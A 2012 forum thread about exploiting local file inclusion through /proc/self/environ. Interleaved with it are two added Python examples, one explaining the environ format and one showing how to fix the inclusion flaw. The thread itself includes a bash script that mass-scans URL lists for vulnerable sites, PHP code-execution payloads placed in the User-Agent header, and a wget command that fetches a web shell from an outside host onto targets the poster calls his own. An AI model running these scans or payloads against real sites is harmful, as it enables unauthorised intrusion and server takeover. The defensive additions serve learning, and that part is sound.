Topic: LFI exploit running in the wild


neusbeer
LFI exploit running in the wild
« on: January 27, 2012, 09:19:35 am »
There's a 'new' LFI attack being used a lot at the moment.
Read this article: http://www.devilscafe.in/2012/01/lfi-and-shell-upload-with-tamper-data.html
It's an LFI with the standard /etc/passwd inclusion, and right after that a check
for /proc/self/environ.
I've never heard of this 'link'.. what is it? I know it's from Linux.. is it the
running account info on the server?
Anyway, it allows the use of a shell ;-)


I made a script to check for the exploit on a URL list.
Input is a list with /etc/passwd in the URL (example list),
and the result is a logfile of URLs where /proc/self/environ is possible.
(After that, tamper the User-Agent to get your shell up there :-))
Code:
#!/bin/bash
# Usage: ./lfi-check.sh urllist.txt
# urllist.txt holds one URL per line, each already carrying /etc/passwd.
# Start with empty logs so results from an earlier run do not pile up.
: > output.log
: > final_list.log

# Pass 1: does the page really include /etc/passwd?
# Match a root passwd entry (root:x:0:0:) rather than the word "root" anywhere on the page.
while IFS= read -r url ; do
  test=$(curl -s --max-time 15 "$url" | grep -i "root:.*:0:0:")
  if [ -z "$test" ]; then
    echo "No LFI in $url"
  else
    echo "LFI found in $url"
    echo "$url" >> output.log
  fi
done < "$1"

# Pass 2: swap /etc/passwd for /proc/self/environ in the hits and look for an
# environment dump (DOCUMENT_ROOT= is a CGI variable, so it only shows up there).
sed 's#/etc/passwd#/proc/self/environ#g' output.log | while IFS= read -r url1 ; do
  test=$(curl -s --max-time 15 "$url1" | grep -i "document_root")
  if [ -z "$test" ]; then
    echo "No /proc/self/environ in $url1"
  else
    echo "/proc/self/environ found in $url1"
    echo "$url1" >> final_list.log
  fi
done
« Last Edit: January 27, 2012, 09:19:55 am by neusbeer »
--Neusbeer

imation
Re: LFI exploit running in the wild
« Reply #1 on: January 27, 2012, 10:04:03 am »
Saw this the other day, very interesting!

I've been using TamperData for years now, brilliant tool.

neusbeer
Re: LFI exploit running in the wild
« Reply #2 on: January 27, 2012, 11:00:07 am »
I don't.. I mostly use Fiddler2 (gives me mostly the same results)..
Testing that TamperData script from Firefox now..
Looks handy..
--Neusbeer

ca0s
Re: LFI exploit running in the wild
« Reply #3 on: January 27, 2012, 12:02:14 pm »
/proc/self/environ contains the environment variables of the current process.
In Apache (I don't know if it works on other servers too) it contains several fields of information, one of them being the User-Agent of the client. If you can include /proc/self/environ and you set your User-Agent to something like "<?php passthru($_GET['s']); ?>", that PHP code will be executed.
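An added example, not code from the thread or the linked article, that parses the format ca0s describes and tightens the "grep for document_root" check from the first post. The environ block in it is constructed to look like what a CGI/suPHP worker carries; real servers differ. One caveat worth knowing before relying on this: whether HTTP_USER_AGENT ends up in /proc/self/environ depends on how PHP is run. Under CGI or suPHP the web server exports the request headers as environment variables of the per-request process, so they are there; under mod_php, "self" is the long-running httpd worker and its environment is whatever it was started with, so the include may show nothing request-related at all.

```python
# Added example, not code from the thread. The environ block below is constructed
# to look like a CGI/suPHP worker's environment; real servers differ.
import os

SAMPLE_ENVIRON = (
    b"DOCUMENT_ROOT=/var/www/html\0"
    b"HTTP_HOST=example.test\0"
    b"HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64)\0"
    b"REQUEST_URI=/index.php?page=../../../../proc/self/environ\0"
    b"SCRIPT_FILENAME=/var/www/html/index.php\0"
)


def parse_environ(raw: bytes) -> dict:
    """/proc/<pid>/environ is a run of KEY=VALUE entries, each ended by a NUL
    byte (no newlines, which is why it looks like one long line in a browser)."""
    env = {}
    for entry in raw.split(b"\0"):
        if not entry:           # the trailing NUL leaves an empty last field
            continue
        key, sep, value = entry.partition(b"=")
        if sep:
            env[key.decode("latin-1")] = value.decode("latin-1")
    return env


def read_own_environ() -> dict:
    """Same format, read for this very process (Linux only). For a PHP include,
    'self' is whichever process runs the PHP, and that decides what is in it."""
    with open("/proc/self/environ", "rb") as fh:
        return parse_environ(fh.read())


def looks_like_environ(body: str, marker: str) -> bool:
    """Stricter version of the thread's grep for 'document_root': the dump must
    carry a CGI variable and must echo the marker we sent as our User-Agent,
    which proves the include reflects request headers and is not just a page
    that happens to mention DOCUMENT_ROOT."""
    return "DOCUMENT_ROOT=" in body and f"HTTP_USER_AGENT={marker}" in body


if __name__ == "__main__":
    env = parse_environ(SAMPLE_ENVIRON)
    print("User-Agent as the worker sees it:", env["HTTP_USER_AGENT"])
    if os.path.exists("/proc/self/environ"):
        print("keys in this process's environ:", sorted(read_own_environ())[:5])
```

In a live check you would send a random string as the User-Agent, decode the response body as latin-1 (the NUL bytes survive that, unlike a UTF-8 decode with errors), and pass body and marker to looks_like_environ before trying any PHP in the header.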

neusbeer
Re: LFI exploit running in the wild
« Reply #4 on: January 27, 2012, 01:32:48 pm »
Yes.. that's the idea! :D


Only I'm struggling with the code.. :P


The way you describe it I get an error about wrong char use in the T_STRING;
the ' won't work... at least on my current targets..
so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt -O shell.php');?>
will return an error that the ' isn't accepted.
When I try with passthru,
<? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt -O shell.php
I get an error that I'm not giving a URL.
(Spaces in the URL, I think?)

--Neusbeer

ande (Administrator)
Re: LFI exploit running in the wild
« Reply #5 on: January 27, 2012, 03:07:55 pm »
> Yes.. that's the idea! :D
>
> Only I'm struggling with the code.. :P
>
> The way you describe it I get an error about wrong char use in the T_STRING;
> the ' won't work... at least on my current targets..
> so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt -O shell.php');?>
> will return an error that the ' isn't accepted.
> When I try with passthru,
> <? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt -O shell.php
> I get an error that I'm not giving a URL.
> (Spaces in the URL, I think?)

I always use <?php ?>, might be the problem. Dunno.

Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.
« Last Edit: January 27, 2012, 03:08:41 pm by ande »

FuyuKitsune
Re: LFI exploit running in the wild
« Reply #6 on: January 27, 2012, 03:43:38 pm »
Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI + log poisoning).

ca0s
Re: LFI exploit running in the wild
« Reply #7 on: January 27, 2012, 04:49:45 pm »
> Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI + log poisoning).
It is the same concept. You "poison" the logs with a User-Agent containing PHP code and then execute it with an LFI. But you need read rights to those logs.

neusbeer
Re: LFI exploit running in the wild
« Reply #8 on: January 27, 2012, 08:54:18 pm »
Log poisoning is something different..


Hmm, and I still can't get the damn thing to work :P
--Neusbeer

neusbeer
Re: LFI exploit running in the wild
« Reply #9 on: February 10, 2012, 08:15:13 pm »
> I always use <?php ?>, might be the problem. Dunno.
>
> Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.
(Sorry for the double post, but I just saw this post.)


Maybe old.. but I just found out.. ;)
And why isn't it fixed by now?


I often check the SpiderLabs blog for new (or in this case old) exploits/hack attempts on their honeypots and servers etc.. and some other contributors on this.
It often gives me a lot of new info on what is being exploited at the moment, and
even the requests etc.


Oh, and a PHP quote has to end with ?> .. always?

--Neusbeer

ande (Administrator)
Re: LFI exploit running in the wild
« Reply #10 on: February 10, 2012, 09:20:13 pm »
> (Sorry for the double post, but I just saw this post.)
>
> Maybe old.. but I just found out.. ;)
> And why isn't it fixed by now?
>
> I often check the SpiderLabs blog for new (or in this case old) exploits/hack attempts on their honeypots and servers etc.. and some other contributors on this.
> It often gives me a lot of new info on what is being exploited at the moment, and
> even the requests etc.

The /proc/self/environ is not an exploit or bug in itself. It is still just a LFI problem. Therefore it is not fixed. Fix the LFI vuln and you fix the /proc/self/environ problem.



> Oh, and a PHP quote has to end with ?> .. always?

PHP tags are always <?php /* do shit here */ ?> or <? /* Do shit here */ ?> depending on version and usage etc.
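An added example, not from the thread, illustrating ande's point that the fix lives in the include, not in /proc. It is written in Python rather than PHP so it runs stand-alone; the two approaches it shows (a fixed allowlist of page names, or canonicalising the requested path and confining it to one directory) apply directly to a PHP include($_GET['page']). The directory and page names are assumptions.

```python
# Added example, not from the thread. Python stand-in for a PHP include($_GET['page']);
# the directory and page names are assumptions.
import os

PAGES_DIR = "/var/www/html/pages"            # assumed directory of includable pages
ALLOWED_PAGES = {"home", "about", "contact"}  # assumed set of legitimate pages


def resolve_page_unsafe(page: str) -> str:
    """The vulnerable shape: whatever the client sends is joined to the base
    directory. An absolute path replaces the base outright and '..' walks out
    of it, which is how /etc/passwd and /proc/self/environ get included."""
    return os.path.join(PAGES_DIR, page)


def resolve_page_allowlist(page: str):
    """Preferred fix: the client picks a name, the server maps it to a file.
    Nothing outside ALLOWED_PAGES can ever be opened."""
    if page not in ALLOWED_PAGES:
        return None
    return os.path.join(PAGES_DIR, page + ".php")


def resolve_page_confined(page: str, base_dir: str = PAGES_DIR):
    """Fix for an open-ended set of pages: reject NUL bytes (older PHP versions
    truncated the path at a NUL) and absolute paths, canonicalise the rest, and
    require the result to stay under base_dir. '../../../../proc/self/environ'
    canonicalises to /proc/self/environ and is refused."""
    if "\0" in page or os.path.isabs(page):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    for p in ("home", "../../../../etc/passwd", "../../../../proc/self/environ"):
        print(p, "->", resolve_page_unsafe(p), "|", resolve_page_allowlist(p),
              "|", resolve_page_confined(p))
```

With either fix in place the User-Agent trick has nothing to attach to: the PHP in the header still lands in the worker's environment, but no request can make the application include that file.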

neusbeer
Re: LFI exploit running in the wild
« Reply #11 on: February 11, 2012, 12:22:15 am »
OK... I've got the wrong examples then.. (about ending with ?>)
ty..
--Neusbeer

 


